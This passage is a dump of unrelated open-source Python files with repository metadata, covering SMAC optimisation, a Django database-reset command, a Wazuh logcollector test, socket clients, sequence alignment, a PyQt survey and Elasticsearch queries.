validation).\n :type max_evaluations: int\n :param parameter_dict: parameter configuration space definition, see :doc:`pcs`.\n :type parameter_dict: dict\n :param conditional_clauses: list of conditional dependencies between parameters, see :doc:`pcs`.\n :type conditional_clauses: list\n :param forbidden_clauses: list of forbidden parameter configurations, see :doc:`pcs`.\n :type forbidden_clauses: list\n :param deterministic: whether the function to be minimized contains random components, see :ref:`non-deterministic`.\n :type deterministic: bool\n :param num_train_instances: number of instances used during the configuration/optimization, see :ref:`training_instances`.\n :type num_train_instances: int\n :param num_test_instances: number of instances used for testing/validation, see :ref:`validation`.\n :type num_test_instances: int\n :param num_runs: number of independent SMAC runs.\n :type num_runs: int\n :param num_procs: number of SMAC runs that can be executed in parallel\n :type num_procs: int\n :param seed: seed for SMAC's Random Number generator. If int, it is used for the first run, additional runs use consecutive numbers. If list, it specifies a seed for every run.\n :type seed: int/list of ints\n :param mem_limit_function_mb: sets the memory limit for your function (value in MB). ``None`` means no restriction. Be aware that this limit is enforced for each SMAC run separately. So if you have 2 parallel runs, pysmac could use twice that value (and twice the value of mem_limit_smac_mb) in total. Note that due to the creation of the subprocess, the amount of memory available to your function is less than the value specified here. This option exists mainly to prevent a memory usage of 100% which will at least slow the system down.\n :type mem_limit_function_mb: int\n :param t_limit_function_s: cutoff time for a single function call. ``None`` means no restriction. If optimizing run time, SMAC can choose a shorter cutoff than the provided one for individual runs. 
If `None` was provided, then there is no cutoff ever!\n \"\"\"\n\n self.smac_options['algo-deterministic'] = deterministic\n \n # adjust the number of training instances\n num_train_instances = None if (num_train_instances is None) else int(num_train_instances)\n \n if (num_train_instances is not None):\n if (num_train_instances < 1):\n raise ValueError('The number of training instances must be positive!')\n # check if instance features are provided\n if (train_instance_features is not None):\n # make sure it's the right number of instances\n if (len(train_instance_features) != num_train_instances):\n raise ValueError(\"You have to provide features for every training instance!\")\n # and the same number of features\n nf = len(train_instance_features[0])\n for feature_vector in train_instance_features:\n if (len(feature_vector) != nf):\n raise ValueError(\"You have to specify the same number of features for every instance!\")\n self.smac_options['feature_file'] = os.path.join(self.working_directory ,'features.dat')\n \n\n\n num_procs = int(num_procs)\n pcs_string, parser_dict = pysmac.remote_smac.process_parameter_definitions(parameter_dict)\n\n # adjust the seed variable\n if isinstance(seed, int):\n seed = list(range(seed, seed+num_runs))\n elif isinstance(seed, list) or isinstance(seed, tuple):\n if len(seed) != num_runs:\n raise ValueError(\"You have to specify a seed for every run!\")\n else:\n raise ValueError(\"The seed variable could not be properly processed!\")\n \n \n self.smac_options['runcount-limit'] = max_evaluations\n if t_limit_function_s is not None:\n self.smac_options['cutoff_time'] = t_limit_function_s\n \n \n # create and fill the pcs file\n with open(self.smac_options['pcs-file'], 'w') as fh:\n fh.write(\"\\n\".join(pcs_string + conditional_clauses + forbidden_clauses))\n \n #create and fill the instance files\n tmp_num_instances = 1 if num_train_instances is None else num_train_instances\n with open(self.smac_options['instances'], 'w') as fh:\n for i in range(tmp_num_instances):\n fh.write(\"id_%i\\n\"%i)\n \n # create and fill the feature file\n if (train_instance_features is not None):\n with open(self.smac_options['feature_file'], 'w') as fh:\n #write a header\n tmp = ['instance_name'] + list(map(lambda i: 'feature{}'.format(i), range(len(train_instance_features[0]))))\n fh.write(\",\".join(tmp));\n fh.write(\"\\n\");\n\n # and then the actual features\n for i in range(len(train_instance_features)):\n tmp = ['id_{}'.format(i)] + [\"{}\".format(f) for f in train_instance_features[i]]\n fh.write(\",\".join(tmp))\n fh.write(\"\\n\");\n \n\n if num_test_instances is not None:\n # TODO: honor the users values for validation if set, and maybe show a warning on stdout\n self.smac_options['validate-only-last-incumbent'] = True\n self.smac_options['validation'] = True\n self.smac_options['test-instances'] = os.path.join(self.working_directory, 'test_instances.dat')\n with open(self.smac_options['test-instances'],'w') as fh:\n for i in range(tmp_num_instances, tmp_num_instances + num_test_instances):\n fh.write(\"id_%i\\n\"%i)\n\n # make sure the java executable is callable and up-to-date\n java_executable = self.smac_options.pop('java_executable')\n check_java_version(java_executable)\n\n timeout_quality = self.smac_options.pop('timeout_quality')\n\n\n # create and fill the scenario file\n scenario_fn = os.path.join(self.working_directory,self.smac_options.pop('scenario_fn'))\n\n \n scenario_options = {'algo', 'algo-exec', 'algoExec',\n 'algo-exec-dir', 'exec-dir', 
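# A minimal sketch of the seed handling inside minimize() above: an int seed
# fans out into consecutive seeds, one per independent SMAC run, while a
# list/tuple must already contain exactly one seed per run.
def normalize_seeds(seed, num_runs):
    if isinstance(seed, int):
        return list(range(seed, seed + num_runs))
    if isinstance(seed, (list, tuple)):
        if len(seed) != num_runs:
            raise ValueError("You have to specify a seed for every run!")
        return list(seed)
    raise ValueError("The seed variable could not be properly processed!")

print(normalize_seeds(0, 3))        # [0, 1, 2]
print(normalize_seeds([7, 11], 2))  # [7, 11]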
'execDir','execdir',\n 'deterministic', 'algo-deterministic',\n 'paramfile', 'paramFile', 'pcs-file', 'param-file',\n 'run-obj', 'run-objective', 'runObj', 'run_obj',\n 'intra-obj', 'intra-instance-obj', 'overall-obj', 'intraInstanceObj', 'overallObj', 'overall_obj', 'intra_instance_obj',\n 'algo-cutoff-time', 'target-run-cputime-limit', 'target_run_cputime_limit', 'cutoff-time', 'cutoffTime', 'cutoff_time', \n 'cputime-limit', 'cputime_limit', 'tunertime-limit', 'tuner-timeout', 'tunerTimeout',\n 'wallclock-limit', 'wallclock_limit', 'runtime-limit', 'runtimeLimit', 'wallClockLimit',\n 'output-dir', 'outputDirectory', 'outdir',\n 'instances', 'instance-file', 'instance-dir', 'instanceFile', 'i', 'instance_file', 'instance_seed_file',\n 'test-instances', 'test-instance-file', 'test-instance-dir', 'testInstanceFile', 'test_instance_file', 'test_instance_seed_file', \n 'feature-file', 'instanceFeatureFile', 'feature_file'\n }\n \n additional_options_fn =scenario_fn[:-4]+'.advanced' \n with open(scenario_fn,'w') as fh, open(additional_options_fn, 'w') as fg:\n for name, value in list(self.smac_options.items()):\n if name in scenario_options:\n fh.write('%s %s\\n'%(name, value))\n else:\n fg.write('%s %s\\n'%(name,value))\n \n # check that all files are actually present, so SMAC has everything to start\n assert all(map(os.path.exists, [additional_options_fn, scenario_fn, self.smac_options['pcs-file'], self.smac_options['instances']])), \"Something went wrong creating files for SMAC! Try to specify a \\'working_directory\\' and set \\'persistent_files=True\\'.\"\n\n # create a pool of workers and make'em work\n pool = MyPool(num_procs)\n argument_lists = [[scenario_fn, additional_options_fn, s, func, parser_dict, self.__mem_limit_smac_mb, smac_classpath(), num_train_instances, mem_limit_function_mb, t_limit_function_s, self.smac_options['algo-deterministic'], java_executable, timeout_quality] for s in seed]\n \n pool.map(pysmac.remote_smac.remote_smac_function, argument_lists)\n \n pool.close()\n pool.join()\n \n # find overall incumbent and return it\n \n scenario_dir = os.path.join(self.__out_dir,'.'.join(scenario_fn.split('/')[-1].split('.')[:-1]))\n \n run_incumbents = []\n \n for s in seed:\n fn = os.path.join(scenario_dir, 'traj-run-%i.txt'%s)\n run_incumbents.append(read_trajectory_file(fn)[-1])\n\n run_incumbents.sort(key = operator.itemgetter(\"Estimated Training Performance\"))\n\n param_dict = run_incumbents[0]['Configuration']\n\n for k in param_dict:\n param_dict[k] = parser_dict[k](param_dict[k])\n\n return( run_incumbents[0][\"Estimated Training Performance\"], param_dict)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/automl_pysmac/pysmac-master/pysmac/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":16173,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"285864006","text":"import os\nimport shutil\nfrom pathlib import Path\n\nfrom django.core import management\nfrom django.core.management import BaseCommand\n\n\nclass Command(BaseCommand):\n help = \"Resets the database (delete db -> delete migrations -> makemigrations --> default migration -> migrate)\"\n\n def handle(self, *args, **options):\n self.stdout.write('Running reset database management command')\n\n # 'core' app directory\n core_app_path = Path(__file__).parents[2]\n\n # 'core/db.sqlite3'\n db_path = os.path.join(Path(__file__).parents[3], \"db.sqlite3\")\n\n # 'core/migrations' folder\n migrations_path = 
os.path.join(core_app_path, \"migrations\")\n\n # stage 1: delete database\n self.stdout.write('[1] Database:')\n\n # try to remove db\n try:\n os.remove(db_path)\n self.stdout.write(' - Deleted db.sqlite3!')\n except FileNotFoundError:\n self.stdout.write(' - Database not found, nothing to do here...')\n\n # stage 2: delete migrations\n self.stdout.write('[2] Delete migrations:')\n\n # find files in the migration folder\n migration_files = os.listdir(migrations_path)\n self.stdout.write(self.style.SUCCESS(' - Found these files: %s' % str(migration_files)))\n\n # remove migration files, except ignored files/directories\n ignored = [\"__init__.py\", \"__pycache__\", \"default\"]\n for file in migration_files:\n if file not in ignored:\n os.remove(os.path.join(migrations_path, file))\n self.stdout.write(' - Removed \"%s\"' % file)\n\n # stage 3: makemigrations\n self.stdout.write('[3] Calling makemigrations:')\n management.call_command('makemigrations')\n\n # stage 4: copy `default/default_migration.py` to `0002_initial.py`\n self.stdout.write('[4] Copying default migration file:')\n src = os.path.join(migrations_path, \"default\", \"default_migration.py\")\n dst = os.path.join(migrations_path, \"0002_initial.py\")\n try:\n shutil.copyfile(src, dst)\n self.stdout.write(' - Migration file \\'0002_initial.py\\' created!')\n except FileNotFoundError:\n self.stdout.write(' - \\'_default_migration.py\\' not found, nothing copied!')\n\n # stage 5: migrate\n self.stdout.write('[5] Calling migrate:')\n management.call_command('migrate')\n\n self.stdout.write(self.style.SUCCESS('\\nSuccessfully completed resetdb!'))\n","repo_name":"chongyih/aasp-core","sub_path":"core/management/commands/resetdb.py","file_name":"resetdb.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28481948963","text":"terms = ['approach', 'breakthrough', 'drug', 'hope',\n 'new', 'patient', 'schizophrenia', 'treatment']\n\nhashed = []\nfor term in terms:\n hashval = 0\n for idx, i in enumerate(term):\n hashval = hashval + (ord(i) * idx+1)\n hashed.append(hashval)\n\nfor idx, term in enumerate(terms):\n print(term, ': ', hashed[idx])\n","repo_name":"ghazimuharam/cosine-measure","sub_path":"src/inverted_index/Hash_inverted_index/hash_fun.py","file_name":"hash_fun.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2970779902","text":"#Eda ARSLAN 170401024\r\n\r\nimport socket\r\nimport os\r\nfrom time import gmtime,strftime\r\nfrom datetime import datetime\r\nimport time\r\nimport datetime\r\n\r\nhost = input(\"Sunucu ip adresini girin: \")\r\n\r\n#host = '192.168.1.36'\r\nport = 142\r\nmsg = \"gecikme hesabi\"\r\n\r\nkmt = 'sudo date --set='\r\n\r\nfrmt = '%m/%d/%Y %H:%M:%S.%f'\r\n\r\ntry:\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n print(\"Sunucu ile bağlanılıyor.\")\r\n \r\nexcept socket.error:\r\n print(\"Hata!\",socket.error)\r\n s.close()\r\n\r\nmsj=s.recv(1024)\r\n\r\n\r\noffset=s.recv(1024)\r\noffset=offset.decode()\r\n\r\ndata=s.recv(1024)\r\ndata=data.decode()\r\nprint(\"data: \",data)\r\n\r\nprint(str(data)+' UTC'+str(offset))\r\n\r\n\r\na = float(data)/1000.0 \r\n\r\n\r\nsaat = datetime.datetime.fromtimestamp(a).strftime(frmt)\r\nprint(\"Tarih ve Saat: \",saat)\r\n\r\nkmt = kmt + '\"' + saat + '\"'\r\nprint(kmt, 
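# Worked example for the position-weighted hash in the hash_fun.py record
# above. Mind the operator precedence: ord(i) * idx+1 evaluates as
# (ord(i) * idx) + 1, not ord(i) * (idx + 1).
term = 'drug'   # one of the terms from that record
hashval = 0
for idx, ch in enumerate(term):
    hashval += ord(ch) * idx + 1
print(hashval)  # (100*0+1) + (114*1+1) + (117*2+1) + (103*3+1) = 661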
'komut')\r\nos.system(kmt)\r\n\r\ns.close()\r\n","repo_name":"nyucel/blm304","sub_path":"final/170401024/istemci.py","file_name":"istemci.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"18382029231","text":"import os\nimport pytest\nimport sys\n\nfrom wazuh_testing.tools import get_service\nfrom wazuh_testing.tools.configuration import load_wazuh_configurations\nimport wazuh_testing.logcollector as logcollector\nimport wazuh_testing.api as api\nfrom wazuh_testing.tools.utils import lower_case_key_dictionary_array\n\n\n# Marks\npytestmark = pytest.mark.tier(level=0)\n\n# Configuration\n\ntest_data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\nconfigurations_path = os.path.join(test_data_path, 'wazuh_basic_configuration.yaml')\n\nlocal_internal_options = {'logcollector.remote_commands': '1', 'logcollector.debug': '2', 'windows.debug': '2'}\n\nwazuh_component = get_service()\n\nif sys.platform == 'win32':\n command = 'tasklist'\n no_restart_windows_after_configuration_set = True\nelif sys.platform == 'darwin':\n command = 'ps aux'\nelif sys.platform == 'sunos5':\n command = 'ps aux -xww' \nelse:\n command = 'ps -aux'\n\n\nparameters = [\n {'LOG_FORMAT': 'command', 'COMMAND': f'{command}', 'ALIAS': 'alias'},\n {'LOG_FORMAT': 'full_command', 'COMMAND': f'{command}', 'ALIAS': 'alias2'}\n]\n\nmetadata = lower_case_key_dictionary_array(parameters)\n\nconfigurations = load_wazuh_configurations(configurations_path, __name__,\n params=parameters,\n metadata=metadata)\nconfiguration_ids = [f\"{x['log_format']}_{x['command']}_{x['alias']}\" for x in metadata]\n\n\n# Fixtures\n@pytest.fixture(scope=\"module\", params=configurations, ids=configuration_ids)\ndef get_configuration(request):\n \"\"\"Get configurations from the module.\"\"\"\n return request.param\n\n\n@pytest.mark.filterwarnings('ignore::urllib3.exceptions.InsecureRequestWarning')\ndef test_configuration_alias(configure_local_internal_options_module,\n get_configuration, configure_environment, file_monitoring, restart_logcollector):\n '''\n description: Check if the 'wazuh-logcollector' daemon changes a command name in the log messages by\n the one defined in the 'alias' tag. For this purpose, the test will monitor a command\n using an alias. Then, it will verify that the 'reading command' event is generated.\n This event includes the output of the command executed and its alias. Finally, the test\n will verify that the Wazuh API returns the same values for the 'localfile' section that\n the configured one.\n\n wazuh_min_version: 4.2.0\n\n tier: 0\n\n parameters:\n - configure_local_internal_options_module:\n type: fixture\n brief: Configure the Wazuh local internal options.\n - get_configuration:\n type: fixture\n brief: Get configurations from the module.\n - configure_environment:\n type: fixture\n brief: Configure a custom environment for testing.\n - file_monitoring:\n type: fixture\n brief: Handle the monitoring of a specified file.\n - restart_logcollector:\n type: fixture\n brief: Clear the 'ossec.log' file and start a new monitor.\n\n assertions:\n - Verify that the logcollector monitors a command with an assigned alias.\n - Verify that the Wazuh API returns the same values for the 'localfile' section as the configured one.\n\n input_description: A configuration template (test_basic_configuration_alias) is contained in an external YAML file\n (wazuh_basic_configuration.yaml). 
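# lower_case_key_dictionary_array is imported from wazuh_testing in the test
# record above; a plausible equivalent, inferred only from its name and from
# how the metadata is indexed, shown here as a sketch rather than the real
# library implementation:
def lower_case_keys(dict_array):
    return [{k.lower(): v for k, v in d.items()} for d in dict_array]

params = [{'LOG_FORMAT': 'command', 'COMMAND': 'ps -aux', 'ALIAS': 'alias'}]
meta = lower_case_keys(params)
print(f"{meta[0]['log_format']}_{meta[0]['command']}_{meta[0]['alias']}")  # command_ps -aux_alias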
That template is combined with two test cases defined\n in the module. Those include configuration settings for the 'wazuh-logcollector' daemon.\n\n expected_output:\n - r'Reading command message.*'\n\n tags:\n - logs\n '''\n cfg = get_configuration['metadata']\n\n log_callback = logcollector.callback_command_alias_output(cfg['alias'])\n log_monitor.start(timeout=10, callback=log_callback,\n error_message=logcollector.GENERIC_CALLBACK_ERROR_COMMAND_MONITORING)\n\n if wazuh_component == 'wazuh-manager':\n api.wait_until_api_ready()\n api.compare_config_api_response([cfg], 'localfile')\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_logcollector/test_configuration/test_basic_configuration_alias.py","file_name":"test_basic_configuration_alias.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"6829396604","text":"import socket\nimport threading\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsocketAddress = ('172.18.109.20', 12345)\n\n\n\ndef listen():\n while True:\n message, address = s.recvfrom(1024)\n l = message.decode().split('^')\n if len(l) == 1:\n printToConsole(message.decode())\n else:\n printToConsole(l[1] + \" : \" + l[0])\n \n\ndef printToConsole(message):\n print(\"\\n\", message)\n\ndef handleInput():\n name = input(\"Enter your name:\")\n s.sendto(name.encode(), socketAddress)\n\n while True:\n snd = input(\"Message: \")\n s.sendto(snd.encode(), socketAddress)\n\nt1 = threading.Thread(target=listen)\nt2 = threading.Thread(target=handleInput)\n\n\nt1.start()\nt2.start()\n\nt1.join()\nt2.join()\n\n","repo_name":"shaheen-senpai/S7DSLAB","sub_path":"Sent Nuclear Codes/ash_client.py","file_name":"ash_client.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9756805331","text":"from domain.complex_numbers import *\n\ndef sequence_sum(numbers, first, last):\n '''input: numbers - an object holding a list of complex numbers\n first - the first position of the sequence\n last - the last position of the sequence\n output: - returns the sum, a complex number\n '''\n real = 0\n imag = 0\n while first <= last:\n real += numbers.get_number(first).real\n imag += numbers.get_number(first).imag\n first += 1\n return complex(real, imag)\n\ndef sequence_product(numbers, first, last):\n '''input: numbers - an object holding a list of complex numbers\n first - the first position of the sequence\n last - the last position of the sequence\n output: - returns the product, a complex number\n '''\n real = numbers.get_number(first).real\n imag = numbers.get_number(first).imag\n first += 1\n while first <= last:\n number = numbers.get_number(first)\n new_real = real * number.real - imag * number.imag\n new_imag = real * number.imag + imag * number.real\n real = new_real\n imag = new_imag\n first += 1\n return complex(real, imag)\n\ndef descending_imaginary(numbers):\n '''input: numbers - an object holding a list of complex numbers\n output: - returns the list in descending order by the imaginary parts\n '''\n copy = numbers.get_all_numbers()\n poz = -1\n for i in range(numbers.get_size()):\n for j in range(i + 1, numbers.get_size()):\n if (copy[i].imag > copy[j].imag):\n aux = copy[i]\n copy[i] = copy[j]\n copy[j] = aux\n return copy\n\ndef test_sequence_sum():\n numbers = Complex_Numbers([[1,2], [3,4], [5,6]])\n assert sequence_sum(numbers, 0, 2) == complex(9, 12)\n assert sequence_sum(numbers, 0, 1) == complex(4, 6)\n 
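# The listen() loop in the ash_client.py record above implies a tiny
# 'payload^sender' wire format; a hypothetical frame rendered the same way:
frame = b'hello there^alice'
parts = frame.decode().split('^')
print(parts[1] + ' : ' + parts[0])  # alice : hello there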
assert sequence_sum(numbers, 0, 0) == complex(1, 2)\n\ndef test_sequence_product():\n numbers = Complex_Numbers([[1,2], [3,4], [5,6]])\n assert sequence_product(numbers, 0, 2) == complex(-85, 20)\n assert sequence_product(numbers, 0, 1) == complex(-5, 10)\n assert sequence_product(numbers, 0, 0) == complex(1, 2)\n\ndef test_descending_imaginary():\n numbers = Complex_Numbers([[0, 1], [5, 0], [-1, 9]])\n assert(descending_imaginary(numbers) == [complex(5, 0), complex(0, 1), complex(-1, 9)])\n numbers = Complex_Numbers([[5 ,0], [0, 1], [-1, 9]])\n assert(descending_imaginary(numbers) == [complex(5, 0), complex(0, 1), complex(-1, 9)])\n","repo_name":"mirtleonard/ComplexNumbers","sub_path":"utils/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7039803117","text":"import cv2\nimport keras\nimport os\nimport math_parser\nimport numpy as np\nfrom symbol_locator import write_contour_images\nfrom math_solver import compute\nimport re\nimport sys\nimport shutil\n\n\ndef natural_sort(l):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n return sorted(l, key=alphanum_key)\n\n\ndef solve_photo(image):\n tmp_dir = 'tmp_images'\n os.mkdir(tmp_dir)\n write_contour_images(image, tmp_dir)\n\n model = keras.models.load_model(\"math_model\")\n label_array = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '-', '*', '/', '(', ')']\n expression = ''\n for _, _, files in os.walk(tmp_dir):\n files = natural_sort(files)\n for file in files:\n image = cv2.imread(\"%s/%s\" % (tmp_dir, file))\n image = image.astype('float32')\n image /= 255\n x = np.expand_dims(image, axis=0)\n labels = model.predict(x)\n label = np.argmax(labels)\n char = label_array[label]\n expression += char\n\n shutil.rmtree(tmp_dir)\n try:\n p = math_parser.parse(expression)\n except:\n return \"error parsing photo content\"\n return compute(p)\n\n\nif __name__ == \"__main__\":\n image = cv2.imread(sys.argv[1])\n print(solve_photo(image))\n","repo_name":"simepavlic/math-solver","sub_path":"photo_solver.py","file_name":"photo_solver.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43517386628","text":"import numpy as np\n\n\ndef __fill_matrix(chain_a, chain_b, similarity_func, gap_penalty = -1):\n matrix = np.zeros((len(chain_a) + 1, len(chain_b) + 1))\n\n for i in range(len(chain_a) + 1):\n matrix[i][0] = gap_penalty * i\n\n for j in range(len(chain_b) + 1):\n matrix[0][j] = gap_penalty * j\n\n for i in range(0, len(chain_a)):\n for j in range(0, len(chain_b)):\n match = matrix[i][j] + similarity_func(chain_a[i], chain_b[j])\n delete = matrix[i][j + 1] + gap_penalty\n insert = matrix[i + 1][j] + gap_penalty\n matrix[i + 1][j + 1] = max(match, delete, insert)\n\n return matrix\n\n\ndef __trace_back(chain_a, chain_b, matrix, similarity, gap_penalty = -1):\n alignment_a = \"\"\n alignment_b = \"\"\n i = len(chain_a) - 1\n j = len(chain_b) - 1\n while i >= 0 or j >= 0:\n if i >= 0 and j >= 0 and matrix[i + 1][j + 1] == matrix[i][j] + similarity(chain_a[i], chain_b[j]):\n alignment_a = chain_a[i] + alignment_a\n alignment_b = chain_b[j] + alignment_b\n i -= 1\n j -= 1\n elif i >= 0 and matrix[i+1][j+1] == matrix[i][j + 1] + gap_penalty:\n alignment_a = chain_a[i] + alignment_a\n alignment_b = \"-\" 
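# Cross-check of the manual multiplication in sequence_product above against
# Python's built-in complex type: (a+bi)(c+di) = (ac - bd) + (ad + bc)i.
a, b, c, d = 1, 2, 3, 4
manual = complex(a * c - b * d, a * d + b * c)
print(manual == (1 + 2j) * (3 + 4j), manual)  # True (-5+10j)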
+ alignment_b\n i -= 1\n\n else:\n alignment_a = \"-\" + alignment_a\n alignment_b = chain_b[j] + alignment_b\n j -= 1\n\n return alignment_a, alignment_b\n\n\ndef needleman_wunsch(chain_a, chain_b, similarity_func, gap_penalty = -1, print_matrix=False):\n matrix = __fill_matrix(chain_a, chain_b, similarity_func, gap_penalty=gap_penalty)\n if print_matrix:\n print(len(matrix[0]))\n\n aligments = __trace_back(chain_a, chain_b, matrix, similarity_func, gap_penalty=gap_penalty)\n score = matrix[-1][-1]\n return aligments, score\n","repo_name":"sovavladislav/bioinformatics-algorithms","sub_path":"needleman_wunsch.py","file_name":"needleman_wunsch.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21728556186","text":"import sys\nimport csv\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QVBoxLayout, QLabel\n\nNUM_SEQUENCES = 50\n\ndef getSequence(path):\n seq = []\n with open(path+\"seq.csv\", \"r\", newline=\"\") as f:\n reader = csv.reader(f)\n for row in reader:\n seq.append((int(row[0]), int(row[1])))\n return seq\n\n\nclass AssessmentWindow(QWidget):\n def __init__(self, imgPath, humanNo, seq, seqNum):\n super().__init__()\n self.imgPath = imgPath\n self.humanNo = humanNo\n self.leftBtn = None\n self.rightBtn = None\n self.seq = seq\n self.seqNum = seqNum\n self.leftLegoNo, self.rightLegoNo = seq[seqNum]\n self.go()\n\n\n def go(self):\n self.setGeometry(400, 0, 500, 800)\n self.setWindowTitle(\"Preference\")\n\n vOuter = QVBoxLayout()\n vOuter.addStretch(1)\n vOuter.addLayout(self.display_human(imgPath))\n vOuter.addLayout(self.display_lego(imgPath))\n vOuter.addStretch(1)\n\n self.setLayout(vOuter)\n self.show()\n\n\n def writeResult(self, result):\n with open(self.imgPath+\"result.csv\", \"a\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerow(result)\n\n\n def next(self):\n if self.seqNum < NUM_SEQUENCES - 1:\n newWindow = AssessmentWindow(self.imgPath, humanNo=self.humanNo,\n seq=self.seq, seqNum=self.seqNum+1)\n\n\n def register(self, leftClicked):\n if leftClicked:\n print(\"left\")\n self.writeResult((self.leftLegoNo, self.rightLegoNo))\n self.next()\n self.close()\n pass\n else:\n print(\"right\")\n self.writeResult((self.rightLegoNo, self.leftLegoNo))\n self.next()\n self.close()\n pass\n\n\n def display_lego(self, imgPath):\n self.leftBtn = QPushButton(\"left\", self)\n self.rightBtn = QPushButton(\"right\", self)\n\n self.leftBtn.clicked.connect(lambda : self.register(True))\n self.rightBtn.clicked.connect(lambda : self.register(False))\n\n vBox1 = QVBoxLayout()\n label = QLabel(self)\n png = QPixmap(imgPath + \"lego_male/face\" + str(self.leftLegoNo) + \".png\")\n label.setPixmap(png)\n vBox1.addStretch(1)\n vBox1.addWidget(label)\n vBox1.addWidget(self.leftBtn)\n vBox1.addStretch(1)\n\n vBox2 = QVBoxLayout()\n label = QLabel(self)\n png = QPixmap(imgPath + \"lego_male/face\" + str(self.rightLegoNo) + \".png\")\n label.setPixmap(png)\n vBox2.addStretch(1)\n vBox2.addWidget(label)\n vBox2.addWidget(self.rightBtn)\n vBox2.addStretch(1)\n\n hBoxFaces = QHBoxLayout()\n hBoxFaces.addStretch(1)\n hBoxFaces.addLayout(vBox1)\n hBoxFaces.addLayout(vBox2)\n hBoxFaces.addStretch(1)\n\n hBoxLabel = QHBoxLayout()\n hBoxLabel.addStretch(1)\n label = QLabel(self)\n label.setText(\"Session \" + str(self.seqNum) + \": Choose the one you think is the best match!\")\n hBoxLabel.addWidget(label)\n 
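# A hypothetical call into the needleman_wunsch record above (assumes the
# module is importable), using a simple +1 match / -1 mismatch similarity
# with the default gap penalty of -1:
def simple_similarity(x, y):
    return 1 if x == y else -1

(aligned_a, aligned_b), score = needleman_wunsch('GATTACA', 'GCATGCU', simple_similarity)
print(score)  # 0.0 for this classic pair; the alignment strings depend on
              # how __trace_back breaks ties between equal-scoring paths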
hBoxLabel.addStretch(1)\n\n vOuter = QVBoxLayout()\n vOuter.addStretch(1)\n vOuter.addLayout(hBoxLabel)\n vOuter.addLayout(hBoxFaces)\n vOuter.addStretch(1)\n\n return vOuter\n\n\n def display_human(self, imgPath):\n vBox = QVBoxLayout()\n img = QLabel(self)\n png = QPixmap(imgPath+\"human\"+ str(self.humanNo) +\".png\", \"1\")\n img.setPixmap(png.scaledToHeight(400))\n\n label = QLabel(self)\n label.setText(\"Target Face:\")\n\n vBox.addStretch(1)\n vBox.addWidget(label)\n vBox.addWidget(img)\n vBox.addStretch(1)\n\n hBox = QHBoxLayout()\n hBox.addStretch(1)\n hBox.addLayout(vBox)\n hBox.addStretch(1)\n\n return hBox\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n imgPath = sys.argv[1]\n # print(imgPath)\n\n window = AssessmentWindow(imgPath, humanNo=0, seq=getSequence(imgPath), seqNum=0)\n\n sys.exit(app.exec_())","repo_name":"PeterBoxXu/pspa","sub_path":"display_qt5.py","file_name":"display_qt5.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36506202900","text":"#! !/usr/bin/env python3\n\nfrom pprint import pprint\n\nfrom elasticsearch import Elasticsearch \nfrom elasticsearch_dsl import Search\n\nimport datetime\nimport dateutil.parser\nfrom collections import defaultdict\n\nimport set_params\n\nimport argparse\nimport sys\nimport os\nimport csv\nfrom csv import DictWriter\nimport json\nfrom filelock import Timeout, FileLock\n\nfrom conf import *\n\n\ndef milisec2iso(milliseconds):\n\ttime0 = dateutil.parser.isoparse('1970-01-01T00:00:00')\n\tdelta = datetime.timedelta(milliseconds=milliseconds)\n\treturn time0 + delta\n\ndef iso2milisec(iso):\n\tdelta = dateutil.parser.isoparse(iso) - dateutil.parser.isoparse('1970-01-01T00:00:00')\n\tdelta = delta.total_seconds() * 1000\n\treturn delta\n\ndef query(es, owner_repo, start_date_str):\n\t\n\tgit = BACKENDS['git']\n\tgithub_issue = BACKENDS['github:issue']\n\tgithub_repo = BACKENDS['github:repo']\n\n\tgit_aoc = STUDIES['enrich_onion:git']\n\tgit_onion = STUDIES['enrich_onion:git']\n\n\tnew_owner_repo = set_params.replace_name(owner_repo)\n\tresults = {'owner_repo':owner_repo}\n\tpop_list = []\n\tdomain_author_count = {}\n\tqueries = []\n\n\tif git:\n\t\tdef S_git():\n\t\t\ts = Search(using=es, index='git_enriched')\n\t\t\ts = s.update_from_dict({'query':{'bool': {'must':[\n\t\t\t\t\t\t\t\t\t\t\t\t{'term' : {'Author_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t\t{'term' : {'Commit_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t\t{'term' : {'github_repo' : owner_repo}}]}}})\n\t\t\treturn s\n\n\t\tdef S_git_recent():\n\t\t\ts = 